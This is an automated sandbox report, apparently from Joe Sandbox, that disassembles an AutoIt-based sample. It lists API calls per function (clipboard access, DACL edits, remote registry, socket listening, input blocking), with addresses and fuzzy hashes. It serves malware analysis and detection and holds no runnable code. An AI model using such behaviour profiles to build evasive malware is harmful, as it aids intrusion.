                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Pointer$Decode$Encode$__lock_doexit
                                              • String ID:
                                              • API String ID: 2158581194-0
                                              • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                              • Instruction ID: 556caec40fc6e490fe3299cb4160b4c27b7d77996ab5c6f1b3d1472ea43f034f
                                              • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                              • Instruction Fuzzy Hash: 50B0123198030C33DA112541EC03F5A3B0C4740B90F100020FE0C1C1E2A5E3766448C9
                                              APIs
                                                • Part of subcall function 00094005: FindFirstFileW.KERNELBASE(?,?), ref: 0009407C
                                                • Part of subcall function 00094005: DeleteFileW.KERNEL32(?,?,?,?), ref: 000940CC
                                                • Part of subcall function 00094005: FindNextFileW.KERNEL32(00000000,00000010), ref: 000940DD
                                                • Part of subcall function 00094005: FindClose.KERNEL32(00000000), ref: 000940F4
                                              • GetLastError.KERNEL32 ref: 0009C292
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                              • String ID:
                                              • API String ID: 2191629493-0
                                              • Opcode ID: 03f99a5a30f29886585a52f10aafd7a89c47faf6c4b091b196b4f9ce05528981
                                              • Instruction ID: eb7df8b923ea5e5601a133e14c811128df8ae5a977814e023df2d53c19902bd4
                                              • Opcode Fuzzy Hash: 03f99a5a30f29886585a52f10aafd7a89c47faf6c4b091b196b4f9ce05528981
                                              • Instruction Fuzzy Hash: C0F0A0326102108FDB15EF59D840FAAB7E9AF88320F058019F9098B352CB74BC02CB94
                                              APIs
                                              • OpenClipboard.USER32(000C0980), ref: 000A465C
                                              • IsClipboardFormatAvailable.USER32(0000000D), ref: 000A466A
                                              • GetClipboardData.USER32(0000000D), ref: 000A4672
                                              • CloseClipboard.USER32 ref: 000A467E
                                              • GlobalLock.KERNEL32(00000000), ref: 000A469A
                                              • CloseClipboard.USER32 ref: 000A46A4
                                              • GlobalUnlock.KERNEL32(00000000,00000000), ref: 000A46B9
                                              • IsClipboardFormatAvailable.USER32(00000001), ref: 000A46C6
                                              • GetClipboardData.USER32(00000001), ref: 000A46CE
                                              • GlobalLock.KERNEL32(00000000), ref: 000A46DB
                                              • GlobalUnlock.KERNEL32(00000000,00000000,?), ref: 000A470F
                                              • CloseClipboard.USER32 ref: 000A481F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                              • String ID:
                                              • API String ID: 3222323430-0
                                              • Opcode ID: aa4c08b87b01a95146c04c469ca3cc697aad29eae329a24b2a865133b58af373
                                              • Instruction ID: 067fc609ecd29b80005d5bf8a58281ff07ebe496cdbd6e3b3164375852945fb1
                                              • Opcode Fuzzy Hash: aa4c08b87b01a95146c04c469ca3cc697aad29eae329a24b2a865133b58af373
                                              • Instruction Fuzzy Hash: 9851B075204201ABE300EFA4EC89FAE77A8AFC5B41F004529F656D61E2DFB4D805CB66
                                              APIs
                                                • Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00088E3C
                                                • Part of subcall function 00088E20: GetLastError.KERNEL32(?,00088900,?,?,?), ref: 00088E46
                                                • Part of subcall function 00088E20: GetProcessHeap.KERNEL32(00000008,?,?,00088900,?,?,?), ref: 00088E55
                                                • Part of subcall function 00088E20: HeapAlloc.KERNEL32(00000000,?,00088900,?,?,?), ref: 00088E5C
                                                • Part of subcall function 00088E20: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00088E73
                                                • Part of subcall function 00088EBD: GetProcessHeap.KERNEL32(00000008,00088916,00000000,00000000,?,00088916,?), ref: 00088EC9
                                                • Part of subcall function 00088EBD: HeapAlloc.KERNEL32(00000000,?,00088916,?), ref: 00088ED0
                                                • Part of subcall function 00088EBD: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00088916,?), ref: 00088EE1
                                              • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00088931
                                              • _memset.LIBCMT ref: 00088946
                                              • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00088965
                                              • GetLengthSid.ADVAPI32(?), ref: 00088976
                                              • GetAce.ADVAPI32(?,00000000,?), ref: 000889B3
                                              • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 000889CF
                                              • GetLengthSid.ADVAPI32(?), ref: 000889EC
                                              • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 000889FB
                                              • HeapAlloc.KERNEL32(00000000), ref: 00088A02
                                              • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00088A23
                                              • CopySid.ADVAPI32(00000000), ref: 00088A2A
                                              • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00088A5B
                                              • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00088A81
                                              • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00088A95
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                              • String ID:
                                              • API String ID: 3996160137-0
                                              • Opcode ID: 9fd5929e60ba24caa7f36bd1bfd8a6adadb3356f10e7775064d067c99c1c0184
                                              • Instruction ID: 63edf63934f016a4746b4f647210e3f6d4deef9e765a18aeb9242eea9c3864bf
                                              • Opcode Fuzzy Hash: 9fd5929e60ba24caa7f36bd1bfd8a6adadb3356f10e7775064d067c99c1c0184
                                              • Instruction Fuzzy Hash: CC615871900219FFEF04EFA5DC45EEEBBB9FF04300F54812AE955A6291DB359A04CB60
                                              APIs
                                                • Part of subcall function 000B147A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,000B040D,?,?), ref: 000B1491
                                              • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 000B0B0C
                                                • Part of subcall function 00034D37: __itow.LIBCMT ref: 00034D62
                                                • Part of subcall function 00034D37: __swprintf.LIBCMT ref: 00034DAC
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 000B0BAB
                                              • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 000B0C43
                                              • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 000B0E82
                                              • RegCloseKey.ADVAPI32(00000000), ref: 000B0E8F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                              • String ID:
                                              • API String ID: 1240663315-0
                                              • Opcode ID: 1e1565bf69ec111558cff124ba861bb67e707ab24ad17fa3aac15332bf356988
                                              • Instruction ID: 5c60663ee742a73e48de4ad236a34b16be2399de91eed3a32d7caafd65765322
                                              • Opcode Fuzzy Hash: 1e1565bf69ec111558cff124ba861bb67e707ab24ad17fa3aac15332bf356988
                                              • Instruction Fuzzy Hash: 91E14B71604210AFCB55DF24C895EABBBE9EF89714F04896DF459DB2A2DB30EC01CB51
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                              • String ID:
                                              • API String ID: 1737998785-0
                                              • Opcode ID: e75d734ddaa608759c30d50d3827d55653e339df501b86bdb3cc9981ca6cb38b
                                              • Instruction ID: 8af089d9c274818aa4602b03b9726a0a75bafb28785e9f60acc75b730124d25b
                                              • Opcode Fuzzy Hash: e75d734ddaa608759c30d50d3827d55653e339df501b86bdb3cc9981ca6cb38b
                                              • Instruction Fuzzy Hash: D321B035201210DFFB11AF64EC49F6E77A8EF84721F108019F9469B2A2CB78AD10CB95
                                              APIs
                                              • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 000A69C7
                                              • WSAGetLastError.WSOCK32(00000000), ref: 000A69D6
                                              • bind.WSOCK32(00000000,?,00000010), ref: 000A69F2
                                              • listen.WSOCK32(00000000,00000005), ref: 000A6A01
                                              • WSAGetLastError.WSOCK32(00000000), ref: 000A6A1B
                                              • closesocket.WSOCK32(00000000,00000000), ref: 000A6A2F
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ErrorLast$bindclosesocketlistensocket
                                              • String ID:
                                              • API String ID: 1279440585-0
                                              • Opcode ID: 6e267720087a51200d231aa5c3e50452c9437a65b5e83d572dd7e207ef389391
                                              • Instruction ID: 2b428c272ca5a880325061afd277ec443761d51878dd5822103c4e25105f8102
                                              • Opcode Fuzzy Hash: 6e267720087a51200d231aa5c3e50452c9437a65b5e83d572dd7e207ef389391
                                              • Instruction Fuzzy Hash: 7321D2346006019FDB10EFA8CC89E6EB7F9EF45720F148658E956AB392CB75AC05CB91
                                              APIs
                                              • FindFirstFileW.KERNEL32(?,?), ref: 0009C329
                                              • _wcscmp.LIBCMT ref: 0009C359
                                              • _wcscmp.LIBCMT ref: 0009C36E
                                              • FindNextFileW.KERNEL32(00000000,?), ref: 0009C37F
                                              • FindClose.KERNEL32(00000000,00000001,00000000), ref: 0009C3AF
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Find$File_wcscmp$CloseFirstNext
                                              • String ID:
                                              • API String ID: 2387731787-0
                                              • Opcode ID: 9447fcc8e68a9124264ae065627382b48ef388161f2764606a25cbb2a1214db8
                                              • Instruction ID: 9cf36720e8e5c08a28438fbe1492a53f2d21b0715ba3696afcd6661b1fae64ae
                                              • Opcode Fuzzy Hash: 9447fcc8e68a9124264ae065627382b48ef388161f2764606a25cbb2a1214db8
                                              • Instruction Fuzzy Hash: E2517D75A046029FEB14DF68D490EAAB3E8FF49310F14861DF956CB3A2DB30AD04DB91
                                              APIs
                                              • InternetQueryDataAvailable.WININET(00000001,?,00000000,00000000), ref: 000A2AAD
                                              • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 000A2AE4
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: Internet$AvailableDataFileQueryRead
                                              • String ID:
                                              • API String ID: 599397726-0
                                              • Opcode ID: f2372e3611484de48692e0826a405ef22159020b1cdc8a87b67e2d6a4756120a
                                              • Instruction ID: de45457e8638a99ab15f745d742c354cf98067c1faa0d419fab19495ca3ec43e
                                              • Opcode Fuzzy Hash: f2372e3611484de48692e0826a405ef22159020b1cdc8a87b67e2d6a4756120a
                                              • Instruction Fuzzy Hash: 0741D271A04609FFEB20DED8CC81EBFB7ECEB51724F10403AF605A6142EB709E419A61
                                              APIs
                                              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,000A9B52,?,000C098C,?), ref: 0009A6DA
                                              • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,?,?,000A9B52,?,000C098C,?), ref: 0009A6EC
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: ErrorFormatLastMessage
                                              • String ID:
                                              • API String ID: 3479602957-0
                                              • Opcode ID: 7f140b38da12babceedebf0ccd87d2d8b9d29255d43f9b3d70a6f0d1d1befc17
                                              • Instruction ID: f5bbf807b320bdd4077e9e3d8ae0bc64c7cf56ec90c7c2ab725df59db1c7e0d6
                                              • Opcode Fuzzy Hash: 7f140b38da12babceedebf0ccd87d2d8b9d29255d43f9b3d70a6f0d1d1befc17
                                              • Instruction Fuzzy Hash: 10F0A73550422DFBEB20AFA4CC48FEA77ADFF09361F008255B918D6191D6309A50CBE1
                                              APIs
                                              • BlockInput.USER32(00000001), ref: 000A45F0
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BlockInput
                                              • String ID:
                                              • API String ID: 3456056419-0
                                              • Opcode ID: 3538f9be4dd4b261962517b4ae10e2964b75b30a20a99f2c72d2614a36ecedc3
                                              • Instruction ID: 056ce705f041ae3adc73c9689c09a9d0c0764f8671246914fbe09788adccf104
                                              • Opcode Fuzzy Hash: 3538f9be4dd4b261962517b4ae10e2964b75b30a20a99f2c72d2614a36ecedc3
                                              • Instruction Fuzzy Hash: 98E0DF352002059FD310AFAAE804E8AF7ECAF94760F008416FC09CB312DAB0FD00CB90
                                              APIs
                                              • GetUserNameW.ADVAPI32(?,?), ref: 00070734
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: NameUser
                                              • String ID:
                                              • API String ID: 2645101109-0
                                              • Opcode ID: 7cc34507aa1ca77859cb38237889cb7275b87b502a80805ab23a0e8358ba0995
                                              • Instruction ID: 8db45e0368c603489a85e50ba9aa23e55eb4e48c5134f14e05e87b1aa1567dbe
                                              • Opcode Fuzzy Hash: 7cc34507aa1ca77859cb38237889cb7275b87b502a80805ab23a0e8358ba0995
                                              • Instruction Fuzzy Hash: F2C04CF1810109DBDB15DBA0D988EEE77BCAB04314F214155A105B2100D778AB44CA71
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: __wcsnicmp$Exception@8Throwstd::exception::exception
                                              • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                              • API String ID: 2660009612-1645009161
                                              • Opcode ID: 4e3f2dfb013f664993735a940bf525c05cf85671306be76165880a6fc9ca85a3
                                              • Instruction ID: e061ea7c0149915c9f533ecdafb9299b61b49a5e571cb6f3c3760140f3247842
                                              • Opcode Fuzzy Hash: 4e3f2dfb013f664993735a940bf525c05cf85671306be76165880a6fc9ca85a3
                                              • Instruction Fuzzy Hash: AAA18EB0B0020AABCB21EF61DD42EBF77A5AF44B40F444038FD05AA293EB719E55D758
                                              APIs
                                              • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000103,?,?,?), ref: 000BA0F7
                                              • SendMessageW.USER32(?,0000113F,00000000,00000008), ref: 000BA1B0
                                              • SendMessageW.USER32(?,00001102,00000002,?), ref: 000BA1CC
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: MessageSend$Window
                                              • String ID: 0
                                              • API String ID: 2326795674-4108050209
                                              • Opcode ID: e138b3457718d1073b6de7bf029d2a6a9177f3cf412e84c2298d0b83a3f5b8ad
                                              • Instruction ID: 09e73dccdb02fb3798f82c2adbb8564a0fb3b77be5be750e1460f3a3c50924cd
                                              • Opcode Fuzzy Hash: e138b3457718d1073b6de7bf029d2a6a9177f3cf412e84c2298d0b83a3f5b8ad
                                              • Instruction Fuzzy Hash: 5902FF70208701AFEB65CF18C848FEABBE4FF86314F04861DF999962A1C779D944CB52
                                              APIs
                                              • GetFileVersionInfoSizeW.VERSION(?,?), ref: 0009499C
                                              • GetFileVersionInfoW.VERSION(?,00000000,00000000,00000000,?,?), ref: 000949C2
                                              • _wcscpy.LIBCMT ref: 000949F0
                                              • _wcscmp.LIBCMT ref: 000949FB
                                              • _wcscat.LIBCMT ref: 00094A11
                                              • _wcsstr.LIBCMT ref: 00094A1C
                                              • VerQueryValueW.VERSION(?,\VarFileInfo\Translation,?,?,?,?,?,?,00000000,?,?), ref: 00094A38
                                              • _wcscat.LIBCMT ref: 00094A81
                                              • _wcscat.LIBCMT ref: 00094A88
                                              • _wcsncpy.LIBCMT ref: 00094AB3
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: _wcscat$FileInfoVersion$QuerySizeValue_wcscmp_wcscpy_wcsncpy_wcsstr
                                              • String ID: %u.%u.%u.%u$04090000$DefaultLangCodepage$StringFileInfo\$\VarFileInfo\Translation
                                              • API String ID: 699586101-1459072770
                                              • Opcode ID: 73570f7107c2fbdd517d385568dabf4ccab4c100cd73ed891e72e29222c6fcac
                                              • Instruction ID: 2b50c100587e737381fd693923c300a79217dd820757e4253a58f07d854d3cd8
                                              • Opcode Fuzzy Hash: 73570f7107c2fbdd517d385568dabf4ccab4c100cd73ed891e72e29222c6fcac
                                              • Instruction Fuzzy Hash: D1411572A04204BAEB15B7749C43EFF77ACDF45761F000069FE04AA193EB74DA0697A5
                                              APIs
                                              • CharUpperBuffW.USER32(?,?), ref: 000B44AC
                                              • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 000B456C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000013.00000002.3139857226.0000000000031000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00030000, based on PE: true
                                              • Associated: 00000013.00000002.3139832652.0000000000030000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000C0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139932233.00000000000E6000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3139994533.00000000000F0000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                              • Associated: 00000013.00000002.3140019337.00000000000F9000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_19_2_30000_Dicks.jbxd
                                              Similarity
                                              • API ID: BuffCharMessageSendUpper
                                              • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                              • API String ID: 3974292440-719923060
                                              • Opcode ID: 698da287731a91bc11e2279cd145c30c9cb61772f6ba5757e9c0d52c7f99b857
                                              • Instruction ID: 334fd07d28de9292e4ff4daa92cc0b055e1c4030d72bea3ab9d86a70fadb16d7
                                              • Opcode Fuzzy Hash: 698da287731a91bc11e2279cd145c30c9cb61772f6ba5757e9c0d52c7f99b857
                                              • Instruction Fuzzy Hash: E4A16C302146419FCB14EF24C951AAAB3A5FF85314F104968F8A69B3E3DB35ED09CB52
                                              APIs
                                              • LoadIconW.USER32(00000063), ref: 0008CBAA
                                              • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0008CBBC
                                              • SetWindowTextW.USER32(?,?), ref: 0008CBD3
                                              • GetDlgItem.USER32(?,000003EA), ref: 0008CBE8
                                              • SetWindowTextW.USER32(00000000,?), ref: 0008CBEE
                                              • GetDlgItem.USER32(?,000003E9), ref: 0008CBFE
